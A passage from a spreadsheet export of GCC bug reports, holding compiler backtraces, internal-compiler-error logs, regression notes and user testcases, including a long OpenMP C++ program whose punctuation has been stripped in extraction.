    at ../../gcc/gcc/lto/lto.c:2517
#7  lto_main () at ../../gcc/gcc/lto/lto.c:2629
#8  0x00000000006ccc4a in compile_file (argc=76 argv=0x12c8470)
    at ../../gcc/gcc/toplev.c:570
#9  do_compile (argc=76 argv=0x12c8470) at ../../gcc/gcc/toplev.c:1928
#10 toplev_main (argc=76 argv=0x12c8470) at ../../gcc/gcc/toplev.c:2000
#11 0x0000003bc6e1ee5d in __libc_start_main (main=0x4a29e0  argc=16 
    ubp_av=0x7fff62bc8e28 init= 
    fini= rtld_fini= 
    stack_end=0x7fff62bc8e18) at libc-start.c:226
#12 0x0000000000486f99 in _start ()
(gdb) 
The input files are very large. I can supply them on demand.
They also require special binutils currently (HJ's latest version)</t>
  </si>
  <si>
    <t>GCC-50073</t>
  </si>
  <si>
    <t>gfortran must not accept function name when result name is present</t>
  </si>
  <si>
    <t>Created attachment 25001
just compile it gfortran must reject it
gfortran must not accept function name when result name is present</t>
  </si>
  <si>
    <t>GCC-9612</t>
  </si>
  <si>
    <t>[i686] compiler fails using -O2 -march=pentium4 succeeds with -O2 -march=i686 or -march=pentium4</t>
  </si>
  <si>
    <t>$ gcc -c -O2 -march=pentium4 compute.c
compute.c: In function `generate_sector':
compute.c:175: unable to find a register to spill in class `FLOAT_REGS'
compute.c:175: this is the insn:
(insn 151 294 155 (set (reg:DF 9 st(1) [104])
        (float_extend:DF (subreg:SF (reg/v:DI 21 rxmm0 [79]) 0))) 133 {*extendsfdf2_1} (nil)
    (nil))
compute.c:175: confused by earlier errors bailing out
$
Release:
3.2.2
Environment:
RedHat Linux 7.3 with all updates.  GCC configured with options
How-To-Repeat:
gcc -c -O2 -march=pentium4 compute.c</t>
  </si>
  <si>
    <t>graeme.ambler</t>
  </si>
  <si>
    <t>GCC-56640</t>
  </si>
  <si>
    <t>[4.8 Regression] bootstrap failure on arm-linux-gnueabi{hf}</t>
  </si>
  <si>
    <t>seen with the 4.8.0 release candidate on arm-linux-gnueabi{hf}
/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/./prev-gcc/xg++ -B/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/./prev-gcc/ -B/usr/arm-linux-gnueabihf/bin/ -nostdinc++ -B/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/prev-arm-linux-gnueabihf/libstdc++-v3/src/.libs -B/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/prev-arm-linux-gnueabihf/libstdc++-v3/libsupc++/.libs -I/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/prev-arm-linux-gnueabihf/libstdc++-v3/include/arm-linux-gnueabihf -I/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/prev-arm-linux-gnueabihf/libstdc++-v3/include -I/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/src/libstdc++-v3/libsupc++ -L/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/prev-arm-linux-gnueabihf/libstdc++-v3/src/.libs -L/build/buildd-gcc-4.8_4.8-20130315-1-armhf-5HYdhU/gcc-4.8-4.8-20130315/build/prev-arm-linux-gnueabihf/libstdc++-v3/libsupc++/.libs -c   -g -O2 -gtoggle -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror   -DHAVE_CONFIG_H -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/../include -I../../src/gcc/../libcpp/include  -I../../src/gcc/../libdecnumber -I../../src/gcc/../libdecnumber/dpd -I../libdecnumber -I../../src/gcc/../libbacktrace -DCLOOG_INT_GMP    ../../src/gcc/ira.c -o ira.o
../../src/gcc/ira.c: In function 'void print_translated_classes(FILE* bool)':
../../src/gcc/ira.c:1396:49: error: iteration 16u invokes undefined behavior [-Werror=aggressive-loop-optimizations]
     fprintf (f  %s -&gt; %s\n reg_class_names[i]
                                                 ^
../../src/gcc/ira.c:1395:3: note: containing loop
   for (i = 0 i &lt; N_REG_CLASSES i++)
   ^
cc1plus: all warnings being treated as errors
make[5]: *** [ira.o] Error 1
configured with
Configured with: -v
	 --with-pkgversion='Debian 4.8-20130315-1'
	 --with-bugurl='file:///usr/share/doc/gcc-4.8/README.Bugs'
	 --enable-languages=cc++gofortranobjcobj-c++
	 --prefix=/usr
	 --program-suffix=-4.8
	 --enable-shared
	 --enable-linker-build-id
	 --libexecdir=/usr/lib
	 --without-included-gettext
	 --enable-threads=posix
	 --with-gxx-include-dir=/usr/include/c++/4.8
	 --libdir=/usr/lib
	 --enable-nls
	 --with-sysroot=/
	 --enable-clocale=gnu
	 --enable-libstdcxx-debug
	 --enable-libstdcxx-time=yes
	 --enable-gnu-unique-object
	 --disable-libitm
	 --enable-plugin
	 --with-system-zlib
	 --enable-objc-gc
	 --enable-multiarch
	 --disable-sjlj-exceptions
	 --with-arch=armv7-a
	 --with-fpu=vfpv3-d16
	 --with-float=hard
	 --with-mode=thumb
	 --enable-checking=release
	 --build=arm-linux-gnueabihf
	 --host=arm-linux-gnueabihf
	 --target=arm-linux-gnueabihf
and 
Configured with: -v
	 --with-pkgversion='Debian 4.8-20130315-1'
	 --with-bugurl='file:///usr/share/doc/gcc-4.8/README.Bugs'
	 --enable-languages=cc++gofortranobjcobj-c++
	 --prefix=/usr
	 --program-suffix=-4.8
	 --enable-shared
	 --enable-linker-build-id
	 --libexecdir=/usr/lib
	 --without-included-gettext
	 --enable-threads=posix
	 --with-gxx-include-dir=/usr/include/c++/4.8
	 --libdir=/usr/lib
	 --enable-nls
	 --with-sysroot=/
	 --enable-clocale=gnu
	 --enable-libstdcxx-debug
	 --enable-libstdcxx-time=yes
	 --enable-gnu-unique-object
	 --disable-libitm
	 --enable-plugin
	 --with-system-zlib
	 --enable-objc-gc
	 --enable-multiarch
	 --disable-sjlj-exceptions
	 --with-arch=armv4t
	 --with-float=soft
	 --enable-checking=release
	 --build=arm-linux-gnueabi
	 --host=arm-linux-gnueabi
	 --target=arm-linux-gnueabi</t>
  </si>
  <si>
    <t>GCC-51005</t>
  </si>
  <si>
    <t>-ftree-tail-merge slows down compilation of 20001226-1.c</t>
  </si>
  <si>
    <t>Reported by David Miller in http://gcc.gnu.org/ml/gcc-patches/2011-10/msg02780.html:
...
My check-gcc runs are completely dominated by the time it takes to
test compile.exp=20001226-1.c
[...]
Unfortunately at -O2 this testcase causes exponential cost problems
which are beyond my skills to fix.  Specifically
tail_merge_optimize() applies it's clusters and
iterate_fix_dominators() hits the worst case O(n) complexity of
et_splay for a CFG structured like this. :-/  %38 of the compilation
time is spent in et_splay().
...</t>
  </si>
  <si>
    <t>GCC-9329</t>
  </si>
  <si>
    <t>test - please ignore</t>
  </si>
  <si>
    <t xml:space="preserve"> Regards
 Mike Norledge
 EMEA Helpdesk
 Motorola             Helpdesk:            +44 (0)1793 565111
 16 Euro Way       Helpdesk Fax:     +44 (0)1793 565551   
 Blagrove             Helpdesk Mail:     EMEA Helpdesk
 Swindon     
 SN5 8YQ
Release:
unknown</t>
  </si>
  <si>
    <t>mnorled1</t>
  </si>
  <si>
    <t>GCC-69577</t>
  </si>
  <si>
    <t>[5/6 Regression] wrong code with -fno-forward-propagate -mavx and 128bit arithmetics since r215450</t>
  </si>
  <si>
    <t>Created attachment 37532
reduced testcase
Output (Intel Software Development Emulator is used to emulate unsupported instructions):
$ gcc -v                                                              
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-233015-checking-yes-rtl-df-nobootstrap-nographite/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --disable-bootstrap --without-cloog --without-ppl --without-isl --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-233015-checking-yes-rtl-df-nobootstrap-nographite
Thread model: posix
gcc version 6.0.0 20160131 (experimental) (GCC) 
$ gcc -O -fno-forward-propagate -fno-split-wide-types -mavx testcase.c
$ sde64 -- ./a.out
0000000000000000
Aborted
Tested revisions:
trunk r233015 - FAIL
trunk r232998 - FAIL
5-branch r232545 - FAIL
4_9-branch r232544 - OK
4_[876]-branch - OK</t>
  </si>
  <si>
    <t>GCC-38067</t>
  </si>
  <si>
    <t>monetary_members.cc: 4 * call to wrong C++ delete</t>
  </si>
  <si>
    <t>I just had a look at some of the source code of the compiler
gcc version 4.4.0 snapshot 20081107.
$ egrep new|delete libstdc++-v3/config/locale/gnu/monetary_members.cc | fgrep __wcs_ps
                  __wcs_ps = new wchar_t[__len]
              delete __wcs_ps
                  __wcs_ps = new wchar_t[__len]
              delete __wcs_ps
The two calls to delete look wrong to me. Maybe delete [] was intended ?
Similar fun &amp; games at
$ egrep new|delete libstdc++-v3/config/locale/gnu/monetary_members.cc | fgrep __wcs_ns
                  __wcs_ns = new wchar_t[__len]
              delete __wcs_ns
                  __wcs_ns = new wchar_t[__len]
              delete __wcs_ns
Again maybe delete [] was intended ?</t>
  </si>
  <si>
    <t>GCC-83025</t>
  </si>
  <si>
    <t>[8 Regression] xfstream::open with char* gets caught on C++17 path overload.</t>
  </si>
  <si>
    <t>Created attachment 42627
Example showing error.  Compile with -std=c++17
char* filename = test.txt
std::ofstream unit
unit.open(filename)
when compiled with C++17 gives:
/home/ed/bin/include/c++/8.0.0/fstream: In instantiation of â€˜decltype ((void)(((std::basic_ofstream*)this)-&gt;std::basic_ofstream::_M_filebuf.open(__s __mode))) std::basic_ofstream::open(const _Path _CharT = char _Traits = std::char_traits decltype ((void)(((std::basic_ofstream*)this)-&gt;std::basic_ofstream::_M_filebuf.open(__s __mode))) = void std::ios_base::openmode = std::_Ios_Openmode]â€™:
err.cpp:18:27:   required from here
/home/ed/bin/include/c++/8.0.0/fstream:895:13: error: request for member â€˜c_strâ€™ in â€˜__sâ€™ which is of non-class type â€˜char* constâ€™
  { open(__s.c_str() __mode) }</t>
  </si>
  <si>
    <t>GCC-52165</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in add_var_loc_to_decl at dwarf2out.c:5430 building libgo on s390/s390x</t>
  </si>
  <si>
    <t>seen with trunk 20120105 works with 20120201
libtool: compile:  /build/buildd-gcc-4.7_4.7-20120205-1-s390-ilh9qc/gcc-4.7-4.7-20120205/build/./gcc/gccgo -B/build/buildd-gcc-4.7_4.7-20120205-1-s390-ilh9qc/gcc-4.7-4.7-20120205/build/./gcc/ -B/usr/s390-linux-gnu/bin/ -B/usr/s390-linux-gnu/lib/ -isystem /usr/s390-linux-gnu/include -isystem /usr/s390-linux-gnu/sys-include -O2 -g -m64 -I . -c -fgo-prefix=libgo_net ../../../../src/libgo/go/net/cgo_unix.go ../../../../src/libgo/go/net/cgo_linux.go ../../../../src/libgo/go/net/dial.go ../../../../src/libgo/go/net/dnsclient.go ../../../../src/libgo/go/net/dnsclient_unix.go ../../../../src/libgo/go/net/dnsconfig.go ../../../../src/libgo/go/net/dnsmsg.go ../../../../src/libgo/go/net/doc.go ../../../../src/libgo/go/net/newpollserver.go ../../../../src/libgo/go/net/fd.go ../../../../src/libgo/go/net/fd_linux.go ../../../../src/libgo/go/net/file.go ../../../../src/libgo/go/net/hosts.go ../../../../src/libgo/go/net/interface.go ../../../../src/libgo/go/net/interface_linux.go ../../../../src/libgo/go/net/ip.go ../../../../src/libgo/go/net/iprawsock.go ../../../../src/libgo/go/net/iprawsock_posix.go ../../../../src/libgo/go/net/ipsock.go ../../../../src/libgo/go/net/ipsock_posix.go ../../../../src/libgo/go/net/lookup_unix.go ../../../../src/libgo/go/net/net.go ../../../../src/libgo/go/net/parse.go ../../../../src/libgo/go/net/pipe.go ../../../../src/libgo/go/net/port.go ../../../../src/libgo/go/net/sendfile_linux.go ../../../../src/libgo/go/net/sock.go ../../../../src/libgo/go/net/sock_linux.go ../../../../src/libgo/go/net/sockopt.go ../../../../src/libgo/go/net/sockopt_linux.go ../../../../src/libgo/go/net/sockoptip.go ../../../../src/libgo/go/net/sockoptip_linux.go ../../../../src/libgo/go/net/tcpsock.go ../../../../src/libgo/go/net/tcpsock_posix.go ../../../../src/libgo/go/net/udpsock.go ../../../../src/libgo/go/net/udpsock_posix.go ../../../../src/libgo/go/net/unixsock.go ../../../../src/libgo/go/net/unixsock_posix.go  -fPIC -o net/.libs/net.o
../../../../src/libgo/go/net/dnsclient_unix.go: In function 'net.lookup':
../../../../src/libgo/go/net/dnsclient_unix.go:184:1: internal compiler error: in add_var_loc_to_decl at dwarf2out.c:5430
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[10]: *** [net/net.lo] Error 1
make[10]: Leaving directory `/build/buildd-gcc-4.7_4.7-20120205-1-s390-ilh9qc/gcc-4.7-4.7-20120205/build/s390-linux-gnu/64/libgo'
make[9]: *** [all-recursive] Error 1</t>
  </si>
  <si>
    <t>GCC-64388</t>
  </si>
  <si>
    <t>[5 Regression] r219037 caused FAIL: gcc.dg/pr44194-1.c</t>
  </si>
  <si>
    <t>On Linux/x86-64 r219037 caused
FAIL: gcc.dg/pr44194-1.c scan-rtl-dump dse1 global deletions = (2|3)
FAIL: gcc.dg/pr44194-1.c scan-rtl-dump-not final insn[: ][^\n]*set \\(mem(?![^\n]*scratch)</t>
  </si>
  <si>
    <t>GCC-3342</t>
  </si>
  <si>
    <t>Build 3.0 on Linux-glibc1 fails: undefined reference to `_IO_2_1_stdout_'</t>
  </si>
  <si>
    <t>I got this error:
./.libs/libgcj.so: undefined reference to `_IO_2_1_stdout_'
./.libs/libgcj.so: undefined reference to `_IO_2_1_stdin_'
collect2: ld returned 1 exit status
I've tried to fix this is serveral way but just ended up replacing the libio.h wiht the one from libc5
Release:
gcc 3.0
Environment:
Linux libc5
Unformatted:
 From: Q@ping.be
 Reply-To: Q@ping.be
 X-Send-Pr-Version: gnatsweb-2.8.1 (1.28)
 X-GNATS-Notify:</t>
  </si>
  <si>
    <t>GCC-27501</t>
  </si>
  <si>
    <t>[4.2 Regression] Shell compatibility problem</t>
  </si>
  <si>
    <t>gmake[3]: Entering directory `/usr/local/scratch/obj/gcc-4.2/gcc'
TARGET_CPU_DEFAULT= \
HEADERS=auto-host.h ansidecl.h DEFINES=USE_COLLECT2 \
/bin/sh ../../../src/gcc-4.2/gcc/mkconfig.sh config.h
../../../src/gcc-4.2/gcc/mkconfig.sh: test: unknown operator ==
gmake[3]: *** [cs-config.h] Error 1
This test only knows operator '='
# sh         
# bar=foo
# test x$bar == baz  echo $?
test: unknown operator ==
# test x$bar = baz  echo $?
1
# test x$bar = xfoo  echo $?
0</t>
  </si>
  <si>
    <t>GCC-48965</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/pr45055.c</t>
  </si>
  <si>
    <t>On Linux/ia32 I got
FAIL: gcc.dg/pr45055.c (test for excess errors)
at random.</t>
  </si>
  <si>
    <t>GCC-1725</t>
  </si>
  <si>
    <t>Internal compiler error in copy_body_r at cp/optimize.c:317</t>
  </si>
  <si>
    <t>When compiling the attached example with -O0 everything
works fine. With -O1 I get:
In file included from depgraph.h:809:
depgraph.h: In member function `std::__normal_iterator&lt;const _Tp* 
   std::vector &gt; std::vector::begin() const [with _Tp 
   = GCONSTRAINT _Alloc = std::allocator]':
depgraph.h:465:   instantiated from `DEPGRAPH::DEPGRAPH(const std::vector &gt; std::allocator &gt; &gt; &gt;&amp; const CONSTRAINTS_TYPE&amp; long unsigned int) [with ATOM_TYPE = GATOM CONSTRAINTS_TYPE = GCONSTRAINTS PROGRAM_TYPE = GPROGRAM]'
depgraph.h:2639:   instantiated from here
depgraph.h:465: Internal compiler error in copy_body_r at cp/optimize.c:317
Release:
CVS sources as of 2001-01-22 (and a few weeks before)
Environment:
sparc-sun-solaris2.8 i386-pc-linux-gnu i386-unknown-freebsd4.2
I believe this crash is portable.
How-To-Repeat:
g++ dl.ii -O1
[nathan] I think this may be the same as 1733 who's test
test case I've attached as it's much smaller</t>
  </si>
  <si>
    <t>GCC-45793</t>
  </si>
  <si>
    <t>[4.6 Regressions]  Numerous test-suite failures</t>
  </si>
  <si>
    <t>These appear to be on x86-64.
FAIL: gfortran.dg/iso_fortran_env_3.f90  -Os  (internal compiler error)
FAIL: gfortran.dg/iso_fortran_env_4.f90  -O  (internal compiler error)
FAIL: gfortran.dg/use_3.f90  -O  (internal compiler error)
FAIL: gfortran.dg/use_rename_6.f90  -O  (internal compiler error)
FAIL: gfortran.dg/is_iostat_end_eor_1.f90  -Os  (internal compiler error)
etc</t>
  </si>
  <si>
    <t>GCC-34233</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE: get_callee_fndecl at tree.c:6592</t>
  </si>
  <si>
    <t>Platform:
  Fedora release 7 (Moonshine)
  Linux idle.lbl.gov 2.6.22.9-91.fc7 #1 SMP Thu Sep 27 20:47:39 EDT 2007 x86_64
x86_64 x86_64 GNU/Linux
% g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /net/rosie/scratch2/rwgk/gcc_trunk/configure --prefix=/net/cci-filer1/vol1/tmp/rwgk/gcc_trunk_130411_x86_64_fc7 --enable-languages=cc++fortran --with-mpfr=/usr
Thread model: posix
gcc version 4.3.0 20071125 (experimental) (GCC)
% g++ -c -fno-strict-aliasing -Wall -O2 -ffast-math -ftrapping-math ice_get_callee_fndecl.cpp
ice_get_callee_fndecl.cpp:1: warning: -fassociative-math disabled other options take precedence
ice_get_callee_fndecl.cpp: In constructor 'cctbx::maptbx::find_gaussian_parameters::find_gaussian_parameters(const scitbx::af::const_ref&amp; const scitbx::af::const_ref&amp; const double&amp; const double&amp; double)':
ice_get_callee_fndecl.cpp:78: internal compiler error: in get_callee_fndecl at tree.c:6592
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I'll attach the reproducer.
There are many ways to make the ICE go away. For example I couldn't find
an easy way to eliminate the dependence on std::string. Both -ffast-math
and -ftrapping-math are essential.
Ralf</t>
  </si>
  <si>
    <t>GCC-50930</t>
  </si>
  <si>
    <t>[C++0x] Valid brace-or-equal-initializer of non-static data member rejected</t>
  </si>
  <si>
    <t>gcc 4.7.0 20111029 (experimental) in C++0x mode rejects the following code
//---
struct nmc {
 nmc() = default
 nmc(nmc // line 3
}
struct A { // line 6
 nmc n{}
} a // line 8
//---
In constructor 'constexpr A::A()':
6|error: use of deleted function 'nmc::nmc(nmc&amp;&amp;)'
3|error: declared here
8|note: synthesized method 'constexpr A::A()' first required here
It seems that the compiler introduces here a copy-initialization while initializing the member nmc in the default constructor but the semantics of the brace-or-equal-initializer don't allow this as described by 12.6.2 p8 and 8.5.</t>
  </si>
  <si>
    <t>GCC-64182</t>
  </si>
  <si>
    <t>wide-int rounding division is broken</t>
  </si>
  <si>
    <t>Testcase for gnat.dg/round_div.adb
-- { dg-do run }
-- { dg-options -O3 }
procedure Round_Div is
   type Fixed is delta 1.0 range -2147483648.0 .. 2147483647.0
   A : Fixed := 1.0
   B : Fixed := 3.0
   C : Integer
   function Divide (X Y : Fixed) return Integer is
   begin
      return Integer (X / Y)
   end
begin
   C := Divide (A B)
   if C /= 0 then
      raise Program_Error
   end if
end Round_Div
Joseph pointed out round_mod_expr has the same issue.</t>
  </si>
  <si>
    <t>GCC-35715</t>
  </si>
  <si>
    <t>openmp usage fault</t>
  </si>
  <si>
    <t>#include
#include
#include
class ProcessorScheduling{
public :vector  schedule(vector  machines vector  jobs int transfer){
vector assignments(0)
vector  &gt; minimization(machines.max_size()vector (machines.max_size()))
int cj
omp_set_num_threads(32)
#pragma omp parallel for private (cj)
for(int i=0i&lt;jobs.max_size()i++){
c=0
for (j=0j&lt;strlen(jobs[i].c_str())j++){
if(isspace(jobs[i][j]))
c++
}
if(c==1){
assignments.resize(assignments.max_size()+1)
assignments[assignments.max_size()-1]=i
}}
if(assignments.max_size()&gt;machines.max_size()){
int minimization[assignments.max_size()][assignments.max_size()]
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;assignments.max_size()i++){
for(int j=machines.max_size()j&lt;assignments.max_size()j++){
//#pragma critical
minimization[i][j]=0}
}}
else{
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=assignments.max_size()i&lt;machines.max_size()i++){
for(int j=0j&lt;machines.max_size()j++)
//#pragma critical
{minimization[i][j]=0}
}}
string sstring flops
omp_set_num_threads(32)
#pragma omp parallel for private (sflopsjc)
for(int i=0i&lt;assignments.max_size()i++){
s=jobs[assignments[i]]
flops=s[0]
c=1
while(!isspace(s[c])){
flops+=s[c]c++}
for(int j=0j&lt;machines.max_size()j++){
{minimization[i][j]=ceil(atoi(flops.c_str())/machines[j])}
}}
vector &gt; balancetime(machines.max_size())
vector starttime(machines.max_size())
for(int i=0i&lt;machines.max_size()i++){
starttime[i]=0
}
int time=0string strint jump=0
vector returns(0)
int firstint interval
vector completed(0)
int startdelay[jobs.max_size()]
vector placements(machines.max_size())
q:
int min
omp_set_num_threads(32)
#pragma omp parallel for private (minj)
for(int i=0i&lt;minimization.max_size()i++){
min=minimization[i][0]
for(int j=1j&lt;minimization.max_size()j++)
if (minimization[i][j]&lt;min)min=minimization[i][j]
for(int j=1j&lt;minimization.max_size()j++)
//#pragma critical
{minimization[i][j]-=min}
}
omp_set_num_threads(32)
#pragma omp parallel for private (minj)
for(int i=0i&lt;minimization.max_size()i++){
int min=minimization[0][i]
for(int j=1j&lt;minimization.max_size()j++)
if (minimization[j][i]&lt;min)min=minimization[j][i]
for(int j=1j&lt;minimization.max_size()j++)
//#pragma critical
{minimization[j][i]-=min}
}
vector &gt; square(minimization.max_size()vector(minimization.max_size()))
vector &gt; cross(minimization.max_size()vector(minimization.max_size()))
int rowline[minimization.max_size()]
int colline[minimization.max_size()]
int markrow[minimization.max_size()]
int markcol[minimization.max_size()]
int zeros=1
int z=1more=0
b:
if (more==1)z++
more=0
zeros=z
int rowcol
omp_set_num_threads(32)
#pragma omp parallel for private (rowcolcj)
for(int i=0i&lt;minimization.max_size()i++){
int c=0
for(int j=0j&lt;minimization.max_size()j++){
if (minimization[i][j]==0&amp;&amp;square[i][j]!=1&amp;&amp;cross[i][j]!=1)
{c++row=icol=j}
}
if (c==zeros){
//#pragma critical
{z=1
square[row][col]=1}
for(int j=0j&lt;minimization.max_size()j++){
if(minimization[j][col]==0&amp;&amp;j!=row&amp;&amp;square[j][col]!=1){
//#pragma critical
{cross[j][col]=1}}
}}}
omp_set_num_threads(32)
#pragma omp parallel for private (crowcolj)
for(int i=0i&lt;minimization.max_size()i++){
int c=0
for(int j=0j&lt;minimization.max_size()j++){
if (minimization[j][i]==0&amp;&amp;square[j][i]!=1&amp;&amp;cross[j][i]!=1)
{c++row=jcol=i}
}
if (c==zeros){
//#pragma critical
{z=1
square[row][col]=1}
for(int j=0j&lt;minimization.max_size()j++){
if(minimization[row][j]==0&amp;&amp;j!=col&amp;&amp;square[row][j]!=1){
//#pragma critical
{cross[row][j]=1}}
}}}
int flag=1
int assigned
omp_set_num_threads(32)
#pragma omp parallel for private (jassigned)
for(int i=0i&lt;minimization.max_size()i++){
if(flag==1){
assigned=0
for(int j=0j&lt;minimization.max_size()j++)
if(square[i][j]==1)assigned=1
if(assigned==0){
//#pragma critical
{flag=0}}
}}
omp_set_num_threads(32)
#pragma omp parallel for private (jassigned)
for(int i=0i&lt;minimization.max_size()i++){
if(flag==1){
int assigned=0
for(int j=0j&lt;minimization.max_size()j++)
if(square[j][i]==1)assigned=1
if(assigned==0){
//#pragma critical
{flag=0}}
}}
if(flag==1){
std::stringstream ss
std::string str
omp_set_num_threads(32)
#pragma omp parallel for private (jssstr)
for(int i=0i&lt;machines.max_size()i++){
for(int j=0j&lt;assignments.max_size()j++){
if (square[j][i]==1){
ss &lt;&lt; assignments[j]
ss &gt;&gt; str
//#pragma critical
{placements[i]+=str+ 
assignments[j]=assignments[assignments.max_size()-1]
assignments.resize(assignments.max_size()-1)}
}}}
goto p
}
flag=1
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;minimization.max_size()i++){
for(int j=0j&lt;minimization.max_size()j++){
if(minimization[i][j]==0&amp;&amp;square[i][j]!=1&amp;&amp;cross[i][j]!=1){
//#pragma critical
{flag=0}}
}}
if (flag==1){
omp_set_num_threads(32)
#pragma omp parallel for private (assignedj)
for(int i=0i&lt;minimization.max_size()i++){
int assigned=0
for(int j=0j&lt;minimization.max_size()j++)
if(square[i][j]==1)assigned=1
if(assigned==0){
//#pragma critical
{markrow[i]=1}}
}
a:int repeat=0
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;minimization.max_size()i++){
if(markrow[i]==1){
for (int j=0j&lt;minimization.max_size()j++){
if(minimization[i][j]==0){
//#pragma critical
{markcol[j]=1}}
}}}
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;minimization.max_size()i++){
if(markcol[i]==1){
for(int j=0j&lt;minimization.max_size()j++){
if(square[j][i]==1&amp;&amp;markrow[j]!=1){
//#pragma critical
{markrow[j]=1repeat=1}}
}}}
if(repeat==1)goto a
omp_set_num_threads(32)
#pragma omp parallel for
for(int i=0i&lt;minimization.max_size()i++){
if(markrow[i]!=1){
//#pragma critical
{rowline[i]=1}}
if(markcol[i]==1){
//#pragma critical
{colline[i]=1}}
}
int smallestint count=0
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;minimization.max_size()i++){
if(rowline[i]!=1){
for(int j=0j&lt;minimization.max_size()j++){
if(colline[j]!=1){
if(count==0){
//#pragma critical
{count=1smallest=minimization[i][j]}}
else if(minimization[i][j]&lt;smallest){
//#pragma critical
{smallest=minimization[i][j]}}
}}}}
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;minimization.max_size()i++){
for(int j=0j&lt;minimization.max_size()j++){
if(rowline[i]!=1&amp;&amp;colline[j]!=1){
//#pragma critical
{minimization[i][j]-=smallest}}
if(rowline[i]==1&amp;&amp;colline[j]==1){
//#pragma critical
{minimization[i][j]+=smallest}}
}}
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;square.max_size()i++){
for(int j=0j&lt;square.max_size()j++){
//#pragma critical
{square[i][j]=0
cross[i][j]=0}}
//#pragma critical
{markrow[i]=0
markcol[i]=0
rowline[i]=0
colline[i]=0}}
goto b
}
more=1goto b
p:first=1
vector machine(32)
vector job(1)
string st
int faddlt
omp_set_num_threads(32)
#pragma omp parallel for private (cfststrsflopsaddlt)
for(int i=0i&lt;machines.max_size()i++){
if(placements[i]!=){
int c=0str=int f=0string st
while(c&lt;strlen(placements[i].c_str())-1){
if(isspace(placements[i][c])){
if(f==0){
st=strif(startdelay[atoi(str.c_str())]&gt;atoi(starttime[i].c_str())){
//#pragma critical
{starttime[i]=startdelay[atoi(str.c_str())]}}}
f=1str=}
else str+=placements[i][c]
c++
}
if(jump==0){
string s=jobs[atoi(str.c_str())]
string flops=
c=0
while(!isspace(s[c])){
flops+=s[c]
c++
}
add=0
if(balancetime[i].max_size()&gt;0){l=0
t=balancetime[i].max_size()
while(l&lt;t){
add+=balancetime[i][l]l++}}
if (startdelay[atoi(str.c_str())]&gt;add)add=startdelay[atoi(str.c_str())]-addelse add=0
//#pragma critical
{balancetime[i].resize(balancetime[i].max_size()+1)
balancetime[i][balancetime[i].max_size()-1]=ceil(atoi(flops.c_str())/machines[i]+add)}
}
if(first==1){
//#pragma critical
{interval=balancetime[i][0]first=0machine[0]=ijob[0]=st}}
else if(balancetime[i][0]&lt;interval){
//#pragma critical
{interval=balancetime[i][0]
machine.resize(1)
job.resize(1)
machine[0]=ijob[0]=st}
}
else if(balancetime[i][0]==interval){
//#pragma critical
{machine.resize(machine.max_size()+1)
job.resize(job.max_size()+1)
machine[machine.max_size()-1]=i
job[job.max_size()-1]=st}}
}}
time+=interval
std::stringstream ss
std::string stri
int spaces
omp_set_num_threads(32)
#pragma omp parallel for private (ssstrstrijcspaces)
for(int i=0i&lt;machine.max_size()i++){
//#pragma critical
{returns.resize(returns.max_size()+1)}
std::stringstream ss
std::string str
ss &lt;&lt; time
ss &gt;&gt; str
std::string stri
ss &lt;&lt; machine[i]
ss &gt;&gt; stri
//#pragma critical
{returns[returns.max_size()-1]=starttime[machine[i]]+ +str+ +job[i]+ +stri
completed.resize(completed.max_size()+1)
completed[completed.max_size()-1]=atoi(job[i].c_str())}
for(int j=0j&lt;jobs.max_size()j++){
c=0
while(spaces&lt;2){
if(isspace(jobs[j][c]))spaces++
}c++str=
while(c&lt;=strlen(jobs[j].c_str())){
if(isspace(jobs[j][c])||c==strlen(jobs[j].c_str())){
if(str==job[i]
str=}
else str+=jobs[j][c]
}
}}
if(completed.max_size()==jobs.max_size())return returns
omp_set_num_threads(32)
#pragma omp parallel for private (cssstr)
for(int i=0i&lt;machines.max_size()i++){
if(balancetime[i].max_size()!=0){
//#pragma critical
{balancetime[i][0]-=interval}
if(balancetime[i][0]==0){
int c=balancetime[i].max_size()-2
while(c&gt;=0){
//#pragma critical
{balancetime[i][c]=balancetime[i][c+1]}
c--
}
//#pragma critical
{balancetime[1].resize(balancetime[i].max_size()-1)}
std::stringstream ss
std::string str
